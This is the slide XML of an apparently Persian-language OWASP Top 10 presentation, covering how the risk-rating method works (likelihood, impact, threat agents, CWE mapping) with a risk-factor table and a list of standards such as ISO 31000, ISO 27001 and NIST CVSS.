                      <a:pPr algn="just">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B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>در این نسخه، سیستم رتبه بندی ریسک را به روز کرده ایم تا در محاسبه احتمال (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>likelihood</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>) و تاثیر هر گونه ریسک داده شده کمک کنیم. برای اطلاعات بیشتر، لطفا در مورد ریسک را ببینید.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>هر سازمان منحصر به فرد است و تهدید کننده برای این سازمان، اهداف آنها و تأثیر هر گونه نقض نیز دارند. اگر سازمان منافع عمومی با استفاده از یک سیستم مدیریت محتوا (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>CMS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>) برای اطلاعات عمومی و یک سیستم سالم از همان </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>CMS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> دقیق برای رکورد های سالم حساس استفاده کند،  تهدید کننده ها و تاثیرات تجاری می توانند برای یک نرم افزار بسیار متفاوت باشند. درک خطرات سازمان شما بر اساس عوامل تهدید قابل اجرا و تاثیرات تجاری بسیار مهم است.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="just" rtl="1"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>در صورت امکان، نام ریسک ها در </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> با ضعف های عمومی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t> Weakness Enumeration </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>CWE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="1200" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                        </a:rPr>
                        <a:t>) به منظور ارتقای شیوه های پذیرفته شده امنیتی و کاهش سردرگمی مطابقت دارد.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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59964945"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="76199" y="6393160"/>
          <a:ext cx="4388400" cy="1029720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1">
                <a:tableStyleId>{B301B821-A1FF-4177-AEE7-76D212191A09}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="612000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="784800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="810000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="784800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="784800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="612000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fa-IR"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عوامل تهدید</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fa-IR"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قابل بهره‌برداری بودن</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fa-IR"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شیوع ضعف</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fa-IR"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قابل تشخیص بودن ضعف</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fa-IR"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اثر تکنیکال</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fa-IR"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تاثیرات کسب و کار</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ویژه برنامه کاربردی</a:t>
                      </a:r>
                      <a:endPar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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده</a:t>
                      </a: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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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۳</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شایع</a:t>
                      </a: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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200"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۳</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ساده</a:t>
                      </a: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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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۳</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>شدید</a:t>
                      </a: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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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۳</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85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مختص کسب و کار</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230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800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>۲</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>عمومی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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۲</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>متوسط</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>۲</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>متعادل</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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۲</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 xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="230400">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>سخت</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>۱</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>نادر</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>۱</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>سخت</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>۱</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fa-IR" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>جزئی</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR" sz="900" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t>۱</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701913584"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4621087" y="5268034"/>
          <a:ext cx="2236914" cy="4637965"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2236914">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns="" xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="337890">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fa-IR"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منابع</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4300075">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4"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" indent="-82800" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR"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روش تعیین ریسک  </a:t>
                      </a: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r" defTabSz="914400" rtl="1" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR"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rPr>
                        <a:t>نوشتاری درباره مدلسازی تهدید/ریسک</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fa-IR" sz="1300" b="1"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خارجی</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="13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ISO 31000: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fa-IR"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استاندارد مدیریت ریسک</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ISO 27001: ISMS</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR"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فریمورک سایبری </a:t>
                      </a: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NIST</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NIST CVSS 3.0</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-82800">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fa-IR"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ابزار مدلسازی تهدید ماکروسافت</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endParaRP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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0">
